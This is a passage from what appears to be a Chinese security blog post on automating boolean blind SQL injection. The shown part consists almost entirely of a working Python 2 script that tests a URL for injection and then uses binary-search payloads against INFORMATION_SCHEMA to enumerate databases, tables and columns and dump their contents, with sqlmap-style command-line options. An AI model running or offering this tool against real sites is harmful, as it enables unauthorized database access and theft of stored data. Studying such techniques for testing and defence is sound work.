class="number">1</span>:</div><div class="line">        count=<span class="number">0</span></div><div class="line">        low=<span class="number">48</span></div><div class="line">        high=<span class="number">57</span></div><div class="line">        <span class="keyword">while</span> low&lt;=high:</div><div class="line">            mid=(low+high)/<span class="number">2</span></div><div class="line">            payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x%s),%d,1))&gt;%d-- "</span>%(url,dbname.encode(<span class="string">"hex"</span>),i,mid)</div><div class="line">            <span class="comment">#print payload</span></div><div class="line">            html=requests.get(url=payload).content</div><div class="line">            <span class="keyword">if</span> basehtml==html:</div><div class="line">                low=mid+<span class="number">1</span></div><div class="line">                count+=<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                high=mid<span class="number">-1</span></div><div class="line">        <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            i=i+<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">break</span></div><div class="line">    <span class="keyword">return</span> int(s)       </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">gettables</span><span class="params">(url,basehtml,num,dbname)</span>:</span></div><div class="line">    <span class="keyword">print</span> <span class="string">"num:%s"</span>%(num)</div><div class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(num):</div><div class="line">        i=<span class="number">1</span></div><div class="line">        length=<span class="string">""</span></div><div class="line">        <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">            count=<span class="number">0</span></div><div class="line">            low=<span class="number">48</span></div><div class="line">            high=<span class="number">57</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(length(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x%s limit %d,1),%d,1))&gt;%d-- "</span>%(url,dbname.encode(<span class="string">"hex"</span>),n,i,mid)</div><div class="line">                <span class="keyword">print</span> payload</div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="keyword">if</span> basehtml==html:</div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                    count+=<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">                length=length+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">                i=i+<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">break</span></div><div class="line">        s=<span class="string">""</span></div><div class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">1</span>,int(length)+<span class="number">1</span>):</div><div class="line">            low=<span class="number">0</span></div><div class="line">            high=<span class="number">126</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s and ascii(substr((select table_name from information_schema.tables where table_schema=0x%s limit %s,1),%s,1))&gt;%s-- "</span>%(url,dbname.encode(<span class="string">"hex"</span>),str(n),str(c),str(mid))</div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                <span class="keyword">if</span> html==basehtml:</div><div class="line">                    <span class="comment">#print payload</span></div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            <span class="keyword">print</span> s</div><div class="line"></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getcolumnnum</span><span class="params">(url,basehtml,tablename,dbname)</span>:</span></div><div class="line">    i=<span class="number">1</span></div><div class="line">    s=<span class="string">""</span></div><div class="line">    <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">        count=<span class="number">0</span></div><div class="line">        low=<span class="number">48</span></div><div class="line">        high=<span class="number">57</span></div><div class="line">        <span class="keyword">while</span> low&lt;=high:</div><div class="line">            mid=(low+high)/<span class="number">2</span></div><div class="line">            payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x%s AND TABLE_SCHEMA=0x%s),%d,1))&gt;%d-- "</span>%(url,tablename.encode(<span class="string">"hex"</span>),dbname.encode(<span class="string">"hex"</span>),i,mid)</div><div class="line">            <span class="comment">#print payload</span></div><div class="line">            html=requests.get(url=payload).content</div><div class="line">            <span class="keyword">if</span> basehtml==html:</div><div class="line">                low=mid+<span class="number">1</span></div><div class="line">                count+=<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                high=mid<span class="number">-1</span></div><div class="line">        <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            i=i+<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">break</span></div><div class="line">    <span class="keyword">return</span> int(s) </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getcolumns</span><span class="params">(url,basehtml,num,tablename,dbname)</span>:</span></div><div class="line">    <span class="comment">#print "num:%s"%(num)</span></div><div class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(num):</div><div class="line">        i=<span class="number">1</span></div><div class="line">        length=<span class="string">""</span></div><div class="line">        <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">            count=<span class="number">0</span></div><div class="line">            low=<span class="number">48</span></div><div class="line">            high=<span class="number">57</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(length(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x%s AND TABLE_SCHEMA=0x%s limit %d,1),%d,1))&gt;%d-- "</span>%(url,tablename.encode(<span class="string">"hex"</span>),dbname.encode(<span class="string">"hex"</span>),n,i,mid)</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="keyword">if</span> basehtml==html:</div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                    count+=<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">                length=length+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">                i=i+<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">break</span></div><div class="line">        s=<span class="string">""</span></div><div class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">1</span>,int(length)+<span class="number">1</span>):</div><div class="line">            low=<span class="number">0</span></div><div class="line">            high=<span class="number">126</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s and ascii(substr((select column_name from information_schema.columns where table_name=0x%s and table_schema=0x%s limit %s,1),%s,1))&gt;%s-- "</span>%(url,tablename.encode(<span class="string">"hex"</span>),dbname.encode(<span class="string">"hex"</span>),str(n),str(c),str(mid))</div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                <span class="keyword">if</span> html==basehtml:</div><div class="line">                    <span class="comment">#print payload</span></div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            <span class="keyword">print</span> s</div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">getdatanum</span><span class="params">(url,basehtml,tablename,dbname)</span>:</span></div><div class="line">    i=<span class="number">1</span></div><div class="line">    s=<span class="string">""</span></div><div class="line">    <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">        count=<span class="number">0</span></div><div class="line">        low=<span class="number">48</span></div><div class="line">        high=<span class="number">57</span></div><div class="line">        <span class="keyword">while</span> low&lt;=high:</div><div class="line">            mid=(low+high)/<span class="number">2</span></div><div class="line">            payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM %s.%s),%d,1))&gt;%d-- "</span>%(url,dbname,tablename,i,mid)</div><div class="line">            <span class="comment">#print payload</span></div><div class="line">            html=requests.get(url=payload).content</div><div class="line">            <span class="keyword">if</span> basehtml==html:</div><div class="line">                low=mid+<span class="number">1</span></div><div class="line">                count+=<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                high=mid<span class="number">-1</span></div><div class="line">        <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            i=i+<span class="number">1</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">break</span></div><div class="line">    <span class="keyword">return</span> int(s)     </div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">dumpdatas</span><span class="params">(url,basehtml,num,columnname,tablename,dbname)</span>:</span></div><div class="line">    <span class="comment">#print "num:%s"%(num)</span></div><div class="line">    <span class="keyword">for</span> n <span class="keyword">in</span> range(num):</div><div class="line">        i=<span class="number">1</span></div><div class="line">        length=<span class="string">""</span></div><div class="line">        <span class="keyword">while</span> <span class="number">1</span>:</div><div class="line">            count=<span class="number">0</span></div><div class="line">            low=<span class="number">48</span></div><div class="line">            high=<span class="number">57</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s AND ORD(MID((SELECT IFNULL(CAST(length(%s) AS CHAR),0x20) FROM %s.%s limit %d,1),%d,1))&gt;%d-- "</span>%(url,columnname,dbname,tablename,n,i,mid)</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="keyword">if</span> basehtml==html:</div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                    count+=<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            <span class="keyword">if</span> count!=<span class="number">0</span>:</div><div class="line">                length=length+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">                i=i+<span class="number">1</span></div><div class="line">            <span class="keyword">else</span>:</div><div class="line">                <span class="keyword">break</span></div><div class="line">        s=<span class="string">""</span></div><div class="line">        <span class="keyword">for</span> c <span class="keyword">in</span> range(<span class="number">1</span>,int(length)+<span class="number">1</span>):</div><div class="line">            low=<span class="number">0</span></div><div class="line">            high=<span class="number">126</span></div><div class="line">            <span class="keyword">while</span> low&lt;=high:</div><div class="line">                mid=(low+high)/<span class="number">2</span></div><div class="line">                payload=<span class="string">"%s and ascii(substr((select %s from %s.%s limit %s,1),%s,1))&gt;%s-- "</span>%(url,columnname,dbname,tablename,str(n),str(c),str(mid))</div><div class="line">                html=requests.get(url=payload).content</div><div class="line">                <span class="comment">#print payload</span></div><div class="line">                <span class="keyword">if</span> html==basehtml:</div><div class="line">                    <span class="comment">#print payload</span></div><div class="line">                    low=mid+<span class="number">1</span></div><div class="line">                <span class="keyword">else</span>:</div><div class="line">                    high=mid<span class="number">-1</span></div><div class="line">            s=s+chr((low+high+<span class="number">1</span>)/<span class="number">2</span>)</div><div class="line">            <span class="keyword">print</span> s</div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">testurl</span><span class="params">(url,basehtml)</span>:</span></div><div class="line">    url1=<span class="string">"%s'"</span>%(url)</div><div class="line">    url2=<span class="string">'%s"'</span>%(url)</div><div class="line">    html1=requests.get(url1).content</div><div class="line">    html2=requests.get(url2).content</div><div class="line">    <span class="keyword">if</span> basehtml!=html1 <span class="keyword">and</span> basehtml!=html2:</div><div class="line">        <span class="comment">#print "this url maybe injectable,type numeric"</span></div><div class="line">        <span class="keyword">return</span> url</div><div class="line">    <span class="keyword">elif</span> basehtml!=html1 <span class="keyword">and</span> basehtml==html2:</div><div class="line">        <span class="comment">#print "this url maybe injectable,type string(\")"</span></div><div class="line">        <span class="keyword">return</span> url1</div><div class="line">    <span class="keyword">elif</span> basehtml==html1 <span class="keyword">and</span> basehtml!=html2:</div><div class="line">        <span class="comment">#print "this url maybe injectable,type string(\")"</span></div><div class="line">        <span class="keyword">return</span> url2</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        <span class="keyword">return</span> <span class="keyword">False</span></div><div class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></div><div class="line">    parser=OptionParser()</div><div class="line">    parser.add_option(<span class="string">"-u"</span>,type=<span class="string">"string"</span>,dest=<span class="string">"url"</span>,help=<span class="string">"-u url"</span>)</div><div class="line">    parser.add_option(<span class="string">"-C"</span>,type=<span class="string">"string"</span>,dest=<span class="string">"column"</span>,help=<span class="string">"-C column1,column2,...,..."</span>)</div><div class="line">    parser.add_option(<span class="string">"-T"</span>,type=<span class="string">"string"</span>,dest=<span class="string">"table"</span>,help=<span class="string">"-T table"</span>)</div><div class="line">    parser.add_option(<span class="string">"-D"</span>,type=<span class="string">"string"</span>,dest=<span class="string">"db"</span>,help=<span class="string">"-D dadabase"</span>)</div><div class="line">    parser.add_option(<span class="string">"--dbs"</span>,action=<span class="string">"store_true"</span>,dest=<span class="string">"dbs"</span>,help=<span class="string">"inject all databases"</span>)</div><div class="line">    parser.add_option(<span class="string">"--dump"</span>,action=<span class="string">"store_true"</span>,dest=<span class="string">"dump"</span>,help=<span class="string">"dump columns with selected table and database"</span>)</div><div class="line">    parser.add_option(<span class="string">"--tables"</span>,action=<span class="string">"store_true"</span>,dest=<span class="string">"tables"</span>,help=<span class="string">"inject all tables in selected database"</span>)</div><div class="line">    parser.add_option(<span class="string">"--columns"</span>,action=<span class="string">"store_true"</span>,dest=<span class="string">"columns"</span>,help=<span class="string">"inject all columns in selected table and database"</span>)</div><div class="line">    (options,args)=parser.parse_args()</div><div class="line">    <span class="keyword">if</span> options.url <span class="keyword">and</span> len(sys.argv)==<span class="number">3</span>:</div><div class="line">        url=options.url</div><div class="line">        basehtml=requests.get(url=url).content</div><div class="line">        result=testurl(url,basehtml)</div><div class="line">        <span class="keyword">if</span> result:</div><div class="line">            <span class="keyword">print</span> <span class="string">"this url maybe injectable"</span></div><div class="line">        <span class="keyword">else</span>:</div><div class="line">            <span class="keyword">print</span> <span class="string">"this url maybe notinjectable"</span></div><div class="line">    <span class="keyword">elif</span> options.url <span class="keyword">and</span> options.dbs:<span class="comment">#--dbs</span></div><div class="line">        url=options.url</div><div class="line">        basehtml=requests.get(url=url).content</div><div class="line">        url=testurl(url,basehtml)</div><div class="line">        num=getdbnum(url,basehtml)</div><div class="line">        getdbs(url,basehtml,num)</div><div class="line">    <span class="keyword">elif</span> options.url <span class="keyword">and</span> options.tables <span class="keyword">and</span> options.db:<span class="comment">#-u url --tables -D database</span></div><div class="line">        url=options.url</div><div class="line">        db=options.db</div><div class="line">        basehtml=requests.get(url=url).content</div><div class="line">        url=testurl(url,basehtml)</div><div class="line">        num=gettablenum(url,basehtml,db)</div><div class="line">        gettables(url,basehtml,num,db)</div><div class="line">    <span class="keyword">elif</span> options.url <span class="keyword">and</span> options.columns <span class="keyword">and</span> options.table <span class="keyword">and</span> options.db:<span class="comment">#-u url --columns -T table -D database</span></div><div class="line">        url=options.url</div><div class="line">        table=options.table</div><div class="line">        db=options.db</div><div class="line">        basehtml=requests.get(url=url).content</div><div class="line">        url=testurl(url,basehtml)</div><div class="line">        num=getcolumnnum(url,basehtml,table,db)</div><div class="line">        getcolumns(url,basehtml,num,table,db)</div><div class="line">    <span class="keyword">elif</span> options.url <span class="keyword">and</span> options.dump <span class="keyword">and</span> options.column <span class="keyword">and</span> options.table <span class="keyword">and</span> options.db:<span class="comment">#-u url --dump  -C column -T table -D database</span></div><div class="line">        url=options.url</div><div class="line">        column=options.column</div><div class="line">        table=options.table</div><div class="line">        db=options.db</div><div class="line">        columns=column.split(<span class="string">","</span>)</div><div class="line">        basehtml=requests.get(url=url).content</div><div class="line">        url=testurl(url,basehtml)</div><div class="line">        num=getdatanum(url,basehtml,table,db)</div><div class="line">        <span class="keyword">for</span> column <span class="keyword">in</span> columns:</div><div class="line">            dumpdatas(url,basehtml,num,column,table,db)</div><div class="line">    <span class="keyword">else</span>:</div><div class="line">        <span class="comment">#print "Please look this script help information,to use --help or -h"</span></div><div class="line">        parser.print_help()</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__==<span class="string">'__main__'</span>:</div><div class="line">    main()</div></pre></td></tr></table></figure>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/python/" rel="tag"># python</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/05/pyblindsqli/" rel="next" title="python编程实现自动化注入之布尔盲注">
                <i class="fa fa-chevron-left"></i> python编程实现自动化注入之布尔盲注
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/07/upload-labs/" rel="prev" title="upload-labs通关教程">
                upload-labs通关教程 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/Ironman.jpg"
                alt="Climber" />
            
              <p class="site-author-name" itemprop="name">Climber</p>
              <p class="site-description motion-element" itemprop="description">信息安全技术博客</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">51</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.shentoushi.top/index" title="渗透测试师导航" target="_blank">渗透测试师导航</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.lorexxar.cn/" title="LoRexxar's Blog" target="_blank">LoRexxar's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.leavesongs.com/" title="P牛" target="_blank">P牛</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.4o4notfound.org/" title="404 Not Found'Blog" target="_blank">404 Not Found'Blog</a>
                  </li>
                
              </ul>
            </div>
          
          

        </div>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=524543708&auto=0&height=66"></iframe>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#python布尔盲注脚本算法完善"><span class="nav-number">1.</span> <span class="nav-text">python布尔盲注脚本算法完善</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#分析sqlmap判断时的payload"><span class="nav-number">1.0.1.</span> <span class="nav-text">分析sqlmap判断时的payload</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#自增查找和二分查找算法对比"><span class="nav-number">1.0.2.</span> <span class="nav-text">自增查找和二分查找算法对比</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲注脚本加强版"><span class="nav-number">1.0.3.</span> <span class="nav-text">盲注脚本加强版</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Climber</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.3</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
  

  

  

  

</body>
</html>
